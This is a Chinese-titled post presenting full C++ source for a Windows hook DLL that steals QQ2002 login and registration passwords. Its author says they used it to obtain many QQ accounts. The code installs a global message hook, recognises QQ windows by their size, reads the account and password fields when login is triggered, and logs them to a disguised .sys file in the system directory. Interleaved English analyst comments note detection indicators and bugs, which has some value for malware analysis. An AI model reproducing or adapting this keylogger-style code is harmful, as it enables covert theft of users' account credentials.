等盗取QQ2002登录密码的代码
出于爱好,写了此小程序,曾经也获取了很多QQ
采用共享数据区方式
1 // hook.cpp : Defines the entry point for the DLL application.
2 //
3 #include " stdafx.h "
4
// Globals placed in a custom PE section named "publicdata". The linker directive
// below marks that section RWS (read / write / shared), so one copy of these
// variables is shared by every process that has this DLL loaded.
// Analyst note: a writable *shared* section with a non-standard name is visible
// in the DLL's section table and is a useful static indicator for this kind of
// hook DLL.
5 #pragma data_seg( " publicdata " )
6 HHOOK hhk = 0 ; // hook handle; set by sethook(), used by GetMsgProc() and unhook()
7 HWND hokkwnd = 0 ; // only referenced from commented-out code in GetMsgProc()
8 HWND hwndqq_zc = 0 ; // target window handle; set by sethook()
9 int k = 0 ; // not referenced anywhere in the visible listing
10 int pc = 0 ; // write index into keys[], used by keyfilter()
11 char keys[ 200 ] = { 0 }; // keystroke buffer filled by keyfilter()
12 #pragma data_seg( )
13 #pragma comment(linker, " /SECTION:publicdata,RWS " )
14 // Creating a shared data segment in a DLL: every variable in it must be explicitly initialised, otherwise the segment is not created.
15
16 /*
17 登录窗体控件id:
18 用户号码: 138
19 密码:180
20 登录(按钮): 1
21 记住密码:323
22
23 注册窗体控件id:
24 用户: 460
25 密码: 461
26 下一步(按钮):12324
27 */
28
29 #include < stdio.h >
30 #include < stdlib.h >
31
32
33
// DLL entry point. Performs no work and returns TRUE for every reason code, so
// nothing observable happens at load time; the hook is only installed when
// sethook() is called.
34 BOOL APIENTRY DllMain( HANDLE hModule,
35 DWORD ul_reason_for_call,
36 LPVOID lpReserved
37 )
38 {
39 return TRUE;
40 }
41
// Result codes returned by GetWnd().
42 const int WND_NONE = 0 ; // not one of the targeted QQ windows
43 const int WND_LOGIN = 1 ; // QQ login window
44 const int WND_ZC = 2 ; // QQ registration window
45
// Classifies a window purely by its outer size as reported by GetWindowRect:
// 462x355 -> WND_ZC, 266x180 -> WND_LOGIN, anything else -> WND_NONE.
// No class name, caption or owning process is checked, so any window with one
// of these exact dimensions is classified the same way.
// NOTE(review): the GetWindowRect return value is ignored; if the call fails,
// rc is read uninitialised.
46 int GetWnd(HWND hwnd){
47 RECT rc;
48 ::GetWindowRect(hwnd, & rc);
49 int w,h;
50 w = rc.right - rc.left;
51 h = rc.bottom - rc.top;
52 if (w == 462 && h == 355 ){
53 return WND_ZC;
54 }
55 if (w == 266 && h == 180 ){
56 return WND_LOGIN;
57 }
58 return WND_NONE;
59 }
60
// File-scope buffer. save() declares its own local `buf`, which shadows this
// one; nothing else in the visible listing uses it.
61 char buf[ 200 ] ;
62
// Stores one character in the shared keys[] buffer at index pc and advances pc.
// When the character is 8 (backspace) the index is stepped back and that slot
// is zeroed, which discards the backspace itself rather than the character
// typed before it.
// The only call site in the visible listing is commented out in GetMsgProc().
// NOTE(review): pc is never checked against the 200-byte size of keys[].
63 void keyfilter( char key){
64 keys[pc] = key;
65 pc ++ ;
66 if (key == 8 ){
67 pc -- ;
68 keys[pc] = 0 ;
69 }
70 }
71
// Reads the account and password fields of the window in hwndqq_zc and appends
// them as one record, in the form account | password &, to a file in the
// Windows system directory.
//
// Analyst notes, all taken from the statements below:
//  - The output file sits in the directory returned by GetSystemDirectory and
//    carries a .sys name, but it is written with fopen/fwrite as plain text in
//    append mode. A text file with a driver extension in the system directory
//    is the on-disk artefact of this code.
//  - Field text is obtained with GetDlgItemText / CB_GETLBTEXT, i.e. through
//    ordinary window messages to the dialog controls.
//  - Nothing in this function sends the data anywhere; it is only written
//    locally.
// NOTE(review): buf and writebuf are 100 bytes and are filled with unbounded
// strcat/strcpy, and the fopen result is used without a NULL check.
72 void save(){
73 // ::MessageBox(0,"Begin dump data",0,MB_OK);
74 /* Check whether Next was pressed while the account/password page is showing */
75 if (GetWnd( hwndqq_zc) == WND_ZC){
76 HWND hsub;
77 hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
78 hsub = ::GetDlgItem(hsub, 460 ); // handle of the account-number control
79 if ( ! IsWindowVisible(hsub)){ // Next was pressed on a different property page: save nothing
80 return ;
81 }
82 }
83
84 char buf[ 100 ],writebuf[ 100 ];;
85
// Build the output path: <system directory> followed by the file-name literal.
86 memset(buf, 0 ,sizeof(buf));
87 ::GetSystemDirectory(buf,sizeof(buf));
88 strcat(buf, " \\winmtq.sys " );
89 // ::MessageBox(0,buf,0,MB_OK);
90 FILE * pfile = fopen(buf, " a+ " );
91
// buf is reused from here on as the scratch buffer for control text.
92 memset(buf, 0 ,sizeof(buf));
93 memset(writebuf, 0 ,sizeof(writebuf));
94 ////////////////////////////////////////////////////////
95 if (GetWnd( hwndqq_zc) == WND_ZC){
96 /* Read the registration-form fields */
97 HWND hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
98 // 460
99 ::GetDlgItemText(hsub, 460 ,buf,sizeof(buf));
100 strcpy(writebuf,buf);
101 strcat(writebuf, " | " );
102 memset(buf, 0 ,sizeof(buf));
103 ::GetDlgItemText(hsub, 461 ,buf,sizeof(buf));
104 strcat(writebuf,buf);
105 strcat(writebuf, " & " );
106 }
107 ////////////////////////////////////////////////////// /
108 /* Read the login-form fields */
109 if (GetWnd(hwndqq_zc) == WND_LOGIN){
110 // ::MessageBox(0,"lgin crack",0,MB_OK);
111 // Read the account number
112 int cursel ;
113
114 HWND hsub;
115 hsub = ::GetDlgItem(hwndqq_zc, 138 );
116 memset(buf, 0 ,sizeof(buf));
// Control 138 is queried with combo-box messages: current selection index,
// then the text of that list entry.
117 cursel = ::SendMessage((HWND)hsub,CB_GETCURSEL, 0 , 0 );
118 ::SendMessage((HWND)hsub,CB_GETLBTEXT,cursel,(LONG)buf);
119 strcpy(writebuf,buf);
120 strcat(writebuf, " | " );
121 memset(buf, 0 ,sizeof(buf));
122 ::GetDlgItemText(hwndqq_zc, 180 ,buf,sizeof(buf));
123 strcat(writebuf,buf);
124 strcat(writebuf, " & " );
125 }
126 ////////////////////////////////////////////////////// /
127
128 // ::MessageBox(0,writebuf,0,MB_OK);
129
// The length is strlen + 2, so each record is followed by two extra bytes taken
// from the zero-filled tail of writebuf. If neither branch above ran, the
// record is just those two bytes.
130 fwrite(writebuf, 1 ,strlen(writebuf) + 2 ,pfile);
131 fclose(pfile);
132
133 }
134
// WH_GETMESSAGE hook procedure installed by sethook(). lParam is treated as a
// pointer to the MSG being retrieved. The procedure looks for two events aimed
// at specific controls of the window stored in hwndqq_zc and calls save() when
// one occurs:
//   - Enter pressed (WM_KEYDOWN / VK_RETURN) while the message target is
//     control 461 (registration form) or 180 (login form);
//   - left mouse button released (WM_LBUTTONUP) on control 12324 (registration
//     form) or 1 (login form).
// The message is always passed on with CallNextHookEx, so the hooked
// application sees no change in behaviour.
// NOTE(review): in both branches btnid stays uninitialised when GetWnd()
// returns WND_NONE, and is then passed to GetDlgItem.
135 LRESULT CALLBACK GetMsgProc(
136 int code, // hook code
137 WPARAM wParam, // removal option
138 LPARAM lParam // message
139 ){
140 MSG * pmsg = (MSG * )lParam;
141 HWND hwnd ; // declared but not used in this function
142 HWND hnext;
143 HWND hlogin; // declared but not used in this function
// Negative codes are passed straight to the next hook without inspection.
144 if (code < 0 ){
145 goto end;
146 }
147
148 /*
149 if(pmsg->message ==WM_CHAR && pmsg->hwnd == hokkwnd){ //
150 // keyfilter(pmsg->wParam);
151
152 }
153 */
154
155 /* The following checks whether the user activated the "Next" or "Login" button */
156
157 if (pmsg -> message == WM_KEYDOWN && pmsg -> wParam == VK_RETURN ){ // && LOWORD(wParam)==12324
158 int btnid;
159 if (GetWnd( hwndqq_zc) == WND_ZC){
160 btnid = 461 ; // 12324;
161 }
162 if (GetWnd(hwndqq_zc) == WND_LOGIN){
163 btnid = 180 ; // covers pressing Enter after typing the password
164 }
165 hnext = ::GetDlgItem(hwndqq_zc,btnid);
// On the registration form the control is looked up in the first child window
// instead of the top-level window.
166 if (GetWnd( hwndqq_zc) == WND_ZC){
167 HWND hs = ::GetWindow(hwndqq_zc,GW_CHILD);
168
169 hnext = ::GetDlgItem(hs,btnid);
170 }
171 // ::MessageBox(0,"key deal",0,MB_OK);
172 if (pmsg -> hwnd == hnext)
173 save();
174 }
175 if (pmsg -> message == WM_LBUTTONUP ){
176 int btnid;
177 if (GetWnd( hwndqq_zc) == WND_ZC){
178 btnid = 12324 ;
179 }
180 if (GetWnd(hwndqq_zc) == WND_LOGIN){
181 btnid = 1 ; // the Login button of the login form
182 }
// Unlike the Enter branch, the lookup here always uses the top-level window,
// also for the registration form.
183 hnext = ::GetDlgItem(hwndqq_zc,btnid);
184 if (pmsg -> hwnd == hnext)
185 save();
186 }
187 end :
188 return CallNextHookEx(hhk,code,wParam,lParam);
189
190 }
191
// Exported entry point. Stores the caller-supplied window handle in the shared
// variable hwndqq_zc and installs GetMsgProc as a WH_GETMESSAGE hook, passing
// this DLL's module handle and thread id 0. Returns false when
// SetWindowsHookEx fails, true otherwise.
// Analyst note: thread id 0 together with a DLL module handle requests a hook
// for all threads on the calling desktop, so Windows loads this DLL into other
// GUI processes. The unexpected module then shows up in the loaded-module
// lists of unrelated processes, which is the main runtime indicator of this
// technique.
// NOTE(review): the GetModuleHandle result is not checked before it is used.
192 extern " C " bool __stdcall __declspec(dllexport) sethook(HWND qqzc /* QQ registration window handle */ ){
193
194 hwndqq_zc = qqzc;
195 HINSTANCE hdll = GetModuleHandle( " hook.dll " );
196 hhk = SetWindowsHookEx(WH_GETMESSAGE,HOOKPROC(GetMsgProc) ,hdll, 0 );
197 if ( ! hhk) return false ;
198 return true ;
199 }
200
// Exported entry point. Removes the hook whose handle is stored in the shared
// variable hhk. The UnhookWindowsHookEx result is ignored and the function
// always returns true; hhk is not reset afterwards.
201 extern " C " bool __stdcall __declspec(dllexport) unhook(){
202 ::UnhookWindowsHookEx(hhk);
203 return true ;
204 }
205
206